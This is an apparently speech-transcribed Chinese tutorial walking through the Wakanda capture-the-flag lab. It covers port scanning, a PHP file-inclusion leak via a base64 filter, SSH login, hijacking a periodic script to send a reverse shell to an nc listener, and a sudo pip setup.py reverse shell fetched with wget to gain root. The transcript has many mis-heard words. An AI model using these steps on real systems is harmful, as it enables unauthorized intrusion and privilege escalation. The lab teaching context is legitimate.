00:00
然后咱们这节课呢,咱们讲的这个靶场呢,叫瓦坎达啊,瓦坎达啊,我严重怀疑他是一个漫威主题的啊,但是我没有证据啊,好,那么我们还是来这个从第一步开始走啊,首先呢,我们还是做一个存活主机的一个发现。嗯,N map-SP192.168.56.0-24。回车啊,等着。稍微会久一点啊好出来了,那么我们刚才通过这if conveer啊,可以看到我们自己的IP呢,是在这个102上面,然后一呢是它的一个网关啊,所以说呢,咱们这节课的这个靶机目标呢,是处于107的这台机机长,那接下来呢,我们对于它处呃来一个这个呃先不少版本吧,我们全端口先扫一下吧,幺幺九二点幺六八点五六点这个107啊全天口扫描。
01:19
啊,这种扫描的时候呢,会稍微慢一点啊,这个不要着急啊,一般情况下呢,也就呃一会儿就出来了。好,已经出来了啊,我们可以看一下,它现在有呢,有四个端口啊,一共是八零端口啊,TCPTP协议啊,然后这两个,这两个不知道是什么东西啊,一个1111个333啊,然后还有一个50749,是一个no啊然后呢,那我们现在呢,既然看不出来它是个什么东西,我们就通过它的服务版本来进行扫描啊杠SV-A啊全面扫描啊,然后呢,还是这个IP。
02:18
好出来了,出来之后呢,我们来看一下啊,八零端口没有什么疑问啊,是一个阿帕奇啊,它目标系统是个顶变,然后呢,是一个阿帕奇的HTP的一个这个服务啊然后呢,呃,三个幺呢,这个东西呢,还是不知道是什么啊啊,它是一个RPC啊,知道是什么了,它是一个RPC啊然后呢,334个三这个呢,它是一个这个SSH啊open SSH6.7P1的一个版本啊,目标还是底遍,然后剩下的那个大端口那个呢,没扫出来啊,不知道是什么啊,那么我们现在呢,可以看到这么多东西,那么接下来呢,我们就打开它的这个web啊,简单的看一眼它web上有什么,因为它有一个八零端口嘛,肯定是有web的2560107啊上来了之后啊,他告诉你是这么一个东西,这么一个东西呢,它里边呢,也没什么有用的东西啊,我们右键先记记一个笔记啊。
03:05
好,那么我们首先呢,刚才呢,少出了一个IP啊,先把它IP记下来,192.168.56.107啊。107啊好,那么我们这个页面上呢,这个没什么东西啊,这是一个home,点了之后也没反应,就加了一个井啊,然后呢,这个也没也没什么东西啊,这个按钮是假的啊,点了之后也没有什么反应啊,但是呢,这有一个东西啊比较重要啊,他告诉你这个人这个这个东西啊掰什么啊掰这个什么妈妈都啊不知道什么东西啊,反正呢,这个应该是一个这个有用的信息啊啊那么右键之后呢,我们打开它的源码页啊,源码页之后呢,我们往上从上往下看啊,大部分的代码呢,没什么问题啊,但是呢,中间呢,有一句这个注释啊,可以引起我们的一个简单注意。这个注释的意思呢,就是。
04:00
我们这是一个超链接啊,一个a class啊,Class后边有一个什么这个nv link艾啊这个,然后后边呢,是有一个her,这个her后边这个东西呢,如果不出意外的情况下啊,应该是一个类似于这个。类似于路径或者参数的东西啊,那这种东西呢,我们一会儿呢会来简单看一下啊,但是我们现在呢,暂时还没有什么其他的这个目标啊,可以看到它啊,只有这么一个东西啊是比较有用的,那么我们回来回来之后呢,那么接下来这个阶段呢,我们就可以使用一下这个,呃,木舟爆破啊。回车啊,抱他一下。好啊,现在有四个200了。
05:01
但是admin和这个backup上面都是空的,Script也是空的,Cell也是空的,也就是说呢,这里边有东西的只有index p p index这个PP和log in,那我们呃,通过这个DRRB来看一下吧,DRRBLDP啊,然后呢,是192.168.56.107啊回撤啊,你可以看到这里头这些东西啊,有四个一个两个啊三个四个啊,五个五个二百一个403403,这个不用管了,那我们这个200的,那就挨个打开看一眼。打开链接。什么也没有,原板也是空的。Back up。空的。Cell。空的。这部分呢,都是空的啊,那根据我们上面这个啊,看到它里边不是空的,只有这个index和这个index log啊,然后呢,我们打开这个index看一下啊,这个index呢,就是我们刚才看的那个页面,所以说呢,也没有什么这个有用的东西,那么我们现在呢,能得到的信息呢,就那么多,那么有用的东西呢,其实也是有的啊,首先我们这个东西怀疑是一个账号名啊,那这个呢,是一个这个类似于路径或者参数的这么一个东西,那我们现在呢,就可以用这个东西呢,来给他这个做一个参考啊,那有这个东西的。
06:26
情况下啊,大部分情况下呢,应该是一个这个文件包含的一个问题啊,那么我们现在呢,其实还有还有可能是售后入入,但是呢,以我们现在这个情况来说,收后录入相对而言比较少啊,当然你也可以尝试一下,我们首先呢,如果说是一个这个文件包含的,正常情况下呢,你就给他来一个这个五六点,这个107,然后什么点什么点杠点杠点点杠点点杠啊这种的给它包进去就行了,但是我试过了没有用啊,所以说咱们就不试了,那么这种情况下呢,可以干什么呢?你可以对它呢,进行一个二次爆破啊,那就是什么DRB啊,然后HTTP啊,然后是这个192.168.56.107啊,然后杠问号,然后是。
07:12
LNG等。LNG等啊,注意这部分才是它真的这个路路径里的东西啊,那后边那个F2,它这个是这个后边的东西啊,等号前面才是啊,我们回车啊,现在先简单看一下后边有什么东西啊,我们可以看到扫出来的东西其实一共有两项啊,那我们直接把它这个复制一下啊,粘贴到这啊,我少复制了一个。复制选区啊。好这么两个东西都是200的一个扣的,那我们现在呢,我反我我访问他一下啊,首先我访问第一个啊,走啊这个是什么跳回主页了啊,然后呢,这个后边等于index呢,我们再走他一下。一个空页面啊,什么也没有啊,那这个的时候呢,我们呢,就去来这个尝试来这个进行对它的一个这个访问叭,如说我们现在呢,直接CRL啊杠I这个呢,其实呢,就是在判断啊,它有没有这个文件包含啊,我们如果有个文件包含的时候呢,它里边呢会有一个includede,那我现在呢,直接去访问他一下这个问号LNG等于FR啊,我一回车啊,你看这个东西直接正常返回了它里边,上面呢是一个这个HTP200OK的一个回包啊,说明这个呢,应该是问题不大,那我们还有一个呢,是等于index啊,Index之后呢,你可以看到它回的是这么一个东西啊,那这个东西呢,就比较可疑了。
08:34
你看HP500啊,然后这个后边有一个serve啊,这个东西,这个东西呢,通常情况下呢,就是这个怀疑会有这个文件包啊,然后呢,接下来呢,我们就会用到一个这个伪协议的这么一个概念,伪协议啊,这是这个P2P的一个概念啊,那你像这个呃,我们的这个伪协议里呢,它有一个东西叫做这个PHP啊,PHP过滤啊,过滤过滤器啊伪协议。
09:05
啊,那这里头这里这个过滤器伪协议里头呢,有很多种啊,大致上分为四种啊,就是转换压缩加密啊,还有这个字符串,那我们现在这个东西呢,我们应该用它里边的这个转换这个转换这个过滤器啊,转换过滤器也就是呢说呢,我们用一个这个叫做这个BASE64-n code的一个过滤器啊,我们就可以检索它这个任意服务器的一个文件了,那么我们现在呢,就可以来直接使用它一下啊,就是使用这个HURL啊,然后呢,是这个HTTP192.168.56.107啊,然后是这个。问号LNG等于PHP,后边呢?这就是这个过滤器的file tr fight啊就是过滤器,然后con啊,然后vt.base64-N扣的。
10:07
R。CE,等于index啊,前面等于index,前面是固定格式啊,你可以这个直接记一记啊,那现在呢,我们来这个后边呢,就给它把这个返回的东西呢,直接输出到一个这个2.php里,好r.PHP啊回车,回车之后呢,回来了,回来之后我们直接cut一下这个r.PHP。好像弄错了,没回来啊这个东西。我把它复制出来啊,重新选检查一下。啊,107,然后杠问浪。等于PP啊,然后是这个。Con。vt.base64杠。
11:00
Uncode。斜杠,Res啊,这写错了啊,Re啊。好,复制一下,然后把这个桌面上的2.php去掉,然后粘贴减去回车啊,这回应该是有了啊,我cut一下2.pp回车,好,这里边就有东西了,但里边的东西呢,你可以看到有一个大段的V464啊,那这种情况下呢,我们就用一个BASE464-D然后把2.pap啊给它解一下。嗯,输入无效。啊,已经解出来了啊,那我们现在呢,就给它直接一个cut cut r cut r之后呢,我们现在来看一下啊,它上面这个东西已经解出来了,解出来的就是这部分啊,它是一个PP的一个东西。好结出来之后呢,首先呢,我们能当大得到两个这个关键信息,有一个这个password啊,有一个password,然后底下这部分呢,你可以可以看到有一个这个其实include就是造成文件包含的原因,然后呢,它果然啊是有一个这个long的这么一个参数啊,看到没?或者说它这个东西不算个参数,它这个文件路径啊,因为后边加了个点PP啊,包含了这么一个浪啊,就是说它这个get的意思,什么意思呢?就是我们在这里边呢,一般情况下呢,我们在这个提交数据的时候,要么用get,要么用这个post嘛,那我们get这里边呢,就是一个叫做long的这么一个参数,然后呢,它在这里呢,把这个参数获取到之后啊,会在后边加一个点PHP,比如说啊,如果说你的long啊,你的long啊,你的long等于一个index啊,那这个时候实际上它就会去找一个叫index.pp的东西,那刚才呢,如果是一个FR呢,就会去找一个叫做fr.PP的一个东西啊,它这。
12:47
这参数是这样子的啊,然后呢,我们这个呢,继续呢,就是找到他密码了啊,那密码找到了,刚才我们找到了一个长得像这个账号的一个东西啊,那么账号密码都有了之后呢,我们可以尝试呢,对他呢,来一个这个SSH登录,但是注意点呢,就是我们的SSH呢,它是不在默认端口上的啊,正常的来说呢,SSH应该在二端口上,但是呢,我们这个呢,它没有二端口,它是在三四个三端口上有一个这个open SSH啊在这呢啊看到没?所以说呢,如果说你现在呢,要给它连上去,你要这样写啊,就是SSH啊,然后是这个这个。
13:27
艾特啊,192.168.56.107,然后呢,后边杠P4个三啊,给指定一下登录端口。粘贴回车啊,然后现在啊,问你这个yes yes之后输入密码啊,那这个这个是密码。啊复制啊,然后我们给它粘贴选区啊回车,回车之后进入到cell了,进入到cell之后呢,现在呢,它是一个伪cell,你可以看到是一个Python2.7.9的一个T啊然后这个东西呢,说明什么?说明这个东西现在属于一个Python的一个这个。
14:02
一个这个环境下啊,那现在呢,你要给它切换成真的,那就用PD呗,我们直接用这个PD给它搞进去啊,就是首先it。UPT。回车啊,然后呢,是这个PT点啊。ppd.spawn。括号。In base啊,不是base。SH啊好,然后回车,回车之后我们切换到了真实cell交互,是啊终端啊,那有了这个之后呢,我们首先LS看一下当前环境,你可以看到有一个flag就放在这儿,那我们直接cut一下这个flag啊,然后呢,它这个东西呢,也不知道有什么用,反正呢,咱们是拿到了第一个flag。
15:06
好,有了第一个flag之后呢,那我们继续呢,要来这个干干下一件事儿啊,那首先呢,我们现在也没什么好干的了,我们现在呢,简单来收集一下它内网,它这个当前的这个服,这个服务器里的这个环境信息,比如说我们看一下ETC下的这个password啊,来简单看一下啊,你可以看到它这里边呢,非常明显啊,在你的这个账户名后边还有一个另外一个呃,账号名啊,我们直接把它复制出来,复制出来之后呢,这个账户名呢,我们可以来先去他的主目录里看一眼啊,直接CD啊,然后home,然后D啊,然后LS,你可以看到这有一个FLAG2啊,找到第二个flag了,然后直接cut这个FLAG2,你看有一个问题就在于啊,你没有没有权限,你打不开它。所以说呢,那我们现在呢,就来这个做其他事情了啊,我们来尝试能不能绕过这件事情啊,比如说我们现在可以来找一下这个我们当前账号啊,能打开的文件啊,都包括什么东西啊,比如说我现在一个find啊查找,然后从这个根目录开始找啊,然后呢,用这个我的user啊,指定一下我的user啊,那user呢,我用的是我这个啊,比如我当前登录这个账号啊,指定用这个账号的一个权限啊,去找这个文件,然后to。
16:24
啊,这个呢,是把这个错误信息啊,给他这个过滤掉,然后GR Rep,呃,杠V啊,然后去过滤它这个权限不够的PR,呃,Mss ion,然后是这个DID啊然后。或PC好,这样呢,给它来进行一下搜索啊,把它这个没用的都过滤掉粘贴。回车。好,那么这么多文件。我看一下啊,这些文件看起来不对劲,我好像搜错了,等一下啊,我看一下。
17:08
一杠或。更V。嗯,也没错啊,但是好像没什么有用的东西。我们给他改一下名字,改成当前这个名字啊。我们收到了另一个账号这个信息啊,我们来搜一下。没车。哦,我们找到了这几个东西。我们把它复制出来啊,复制出来我们另一个账号呢,能找到这些东西,那这里头呢,比较重要的东西呢,大概是。这些东西这三个啊,那我们首先呢,底下这些home,底下这几这几个呢,就暂时先不看了,我们先看一下前三个啊,首先呢,最为可疑的是src下有一个antis啊,这个东西是反病毒的,那在这种瓦机里看到这种东西啊,那你就一定要看一眼对不对啊,那就是SRV啊,然后是。
18:19
点 antitver.PY你可以看到里头它其实就一句话一个open啊,然后它叫创建一下这个目录下的这个东西,然后呢,一个W,然后一个white t ST啊,然后呢,我们看到这个东西之后呢,我们现在LS-LA看一下SRV底下的一个,呃,权限相关的一个东西啊,你可以看到这个antis,它的这个所有者啊,其实就是刚才我们看到那个用户,然后呢,它的权权限的是有问题的,它有读写权限,它没有执行权限啊,那这个就比较搞事情了,但是呢,我们发现一个问题,就是它这个脚本里执行时候要创建的这个文件呢,它已经被创建出来了,看见了吗?啊,就是我们在搜索的时候把它搜出来的,那么这个时候呢,我们再看一下它那个文件LS-LA啊,然后呢,看。
19:06
看一下临时文件夹,然后你可以看到一个问题啊,就是它这个TST这个文件啊,就是他创建这个文件,它的创建时间啊,是有问题的啊,是我刚创建出来的。啊,这个代表着什么呢?这个代表着它这个东西啊,在我们开机之后啊,它有重新的干嘛打开这个靶机之后啊,它有重新的进行执行这个脚本,按这个这个脚本,那么什么东西能自动执行呢?首先呢,我们第一个推推断啊,那就是应该是有一个这个类似于这个计划任务之类的东西,对不?我们在呢,就可以来去找是这个任再去个ython,把TT这个给它创建出来了,那我们现在呢,直接去这个find。新nt us。
20:12
加1P,然后是这个杠V。好,还是后边这个啊,我们直接给他复制一下。粘贴回车。回车之后呢,我们看到这三个东西啊,我们直接复制一下啊,复制一下之后呢,你可以看到第一个呢,就是它这个这个pthon脚本,第二个你看这底下有一个这个service的一个service啊,那我们首先呢,还是来给它cut一下啊,看看它里边到底写的是个什么东西。看完事之后呢,你可以看到这里头呢,就是一个这个类似于计划任务的一个脚本信息啊,首先呢,它的用户呢,就是我们刚才打开那个用户,然后间隔时间呢是300秒,然后呢,它的执行啊执行start呢,就是我们刚才看到的那个Python脚本啊,然后呢,底下有一个这个install安装啊,那么通过这个东西呢,我们可以判断啊,它这个东西呢,会300秒运行一次那个脚本啊,然后呢,由这个由我们刚才那个用户去执行,所以说呢,那现在呢,我们如果想要给它进行反呢,那我们就要给他进行一下,把一个脚本进行一个修改啊,这个是咱们反的一个脚本。
21:22
好,然后呢,我们在这儿呢,对它进行一个修改,首先呢,我们在卡里本机上啊,要给他进行一个NC的一个监听。NRP121呃1235吧,好,然后给他脚本改一下啊,改成12135好然后复制啊复制完事之后回来之后,我要修改的那个我用nano啊来这个修改刚才这个SRV底下的这个点anti vis啊好,那么现在呢,我直接啊给它来进行这个粘贴。诶,我没复制是吗。粘出什么东西来?
22:01
好,然后。复制。粘贴选区好,粘完了啊,然后CTRL加O保存回RLCTRL加X退出,然后再CT一下它的内容,看它有没有正常的写进去,小说没有问题。没有问题呢,那接下来呢,就是等待了啊,我们要等它300秒啊,看他300秒之内啊,对我们进行一个这个盘南下的一个连接啊,那这段时间呢,我们先把这个录像暂停一下啊,因为300秒还挺长的。啊,大家看一下啊,我们的赛已经回来了啊,说明什么啊,说明我们刚才这个东西没问题啊,他这个赛已经自己就回来了啊,那接下来呢,我们要给他转成这个普通的赛,我给他找一个啊,我这个笔记里头有一个Python啊这呢。然后直接啊给它输入粘贴,粘贴完事之后呢,现在呢,我们就进入到另一个上这个另一个账号上边了啊,它反弹已经弹回来了,那么接下来呢,我们就可以继续了啊,那首先我ID一下,ID一下你发现我们的用户权限实没什么没有入入的入权限啊,还是普通用户,按照普通用户之后呢,那接下来呢,我用速度L啊,我来检查一下我速度的一个权限啊,然后呢这呢有一个比较特殊的点,就是你可以看到它这呢有一个东西是什么东西啊,是一个我的这个pip,它有一个这个速度权限啊,除了其他一些东西之外,它底下用一个pip,那P这个东西啊,通常是就是在用干什么的,应该这个比方说一个Python用的比较多的应该知道啊,它可以用来安装啊,对不对,那所以说呢,我们现在呢,它有这个速度权限呢,意味着什么呢?意意味着我可以给他一个set up.py啊,然后干嘛呢?假假装成一个安装脚本啊,让这个pip去执行啊,那我这呢,我也给他准备了一个cell啊,就这样的一个CE,一个反弹CE啊,然后呢,这。
23:49
是从网上扒下来的啊,这个我然后呢,我直接给他这个改一下什么呢?改一下他这个IP和这个反正端口就行了,比如说我现在给他改了12137,然后直接复制,复制之后呢,我现在呢,直接这个给他,呃哦这样吧,我在我本地给他弄一个吧,啊直接右键啊打开终端,打开终端之后呢,我直接VM啊,然后这个setup.py。
24:15
回车啊,然后这种这种反弹下的这种脚本非趁找啊,一一找一大堆啊,大家可以自己来这个找一下,然后我们粘贴,粘贴之后呢,我们现在呢,直接WQ啊WQ的的保存一下啊是12137,那我们现在呢,在这儿呢,再打开终端啊,直接NC一个这个NVLP12137好回车,回车之后呢,我们就等着这个把这个东西传过去啊,那我在这个位置上用这个PYTHON3啊Python。Y ho3-M啊http.server。8787。回撤。啊,不对。
25:00
啊啊没问题啊,我我我这个东西是用来获取的啊,然后我这边w get。W get,然后呢,HTTP192.168点。五六点幺零二,然后呢,是这个8787,然后是set up.py车啊,然后我们LS啊,我们这个东西已经诶。啊,我这个路径不对啊,我先CMD一下啊CMD啊不是CMD去了这个CD到这个TMD啊说错了啊CDTMP,然后到这个路径下啊,然后现在呢,我们再执行一次这个w get。热眼区啊,然后W粘贴。哎,啥玩意儿上面儿。啊,复制错了,那我重新w get一下吧,W get http啊,然后是192.168.56.1028787啊,然后是set up.pyls啊诶。
26:12
没有。这天灯会断了吗?我重新改一个8989。复制选区啊,重新再来一下。W192.168.56点。1028989啊,写错了啊,Set IP了啊,Set up啊啊然后呢,我直接再给他盖一下。粘贴来LS啊,这回下来了啊,下来这个Python脚本之后呢,那我就可以直接速度啊,因为我这个pip这个东西是有速度权限的,那我直接速度啊,然后install啊一个点,然后回车。
27:00
好,那我这边呢,监听这个端口,你可以看到它回来了,回来一个root啊,直接一个ID,你看它是root源线,那有了root源线之后呢,我们现在呢,就可以干嘛呢?来去找刚才那个home下的那个叫什么来着,Home下的这个叫啊CD先CD到吧啊,然后LS啊底下对CDDVSLS啊然后呢,现在我们看这个flagx啊flag2.tst。回春。啊,这个flag2.tst啊就也出来了啊呃,应该没什么东西了啊,如果说有第三个我就不知道他在哪,但是呢,咱们好在哪呢,我们直接现在是有root权限的啊,无论他在哪都无所谓啊。啊,这是FLAG1啊,刚才FLAG2啊,反正两个呢都已经拿到了,好两个flag都拿到了啊,应该没有第三个隐藏的flag了啊,那现在呢,这个靶机呢,他就也算是穿了啊,我们已经把它打通了。
我来说两句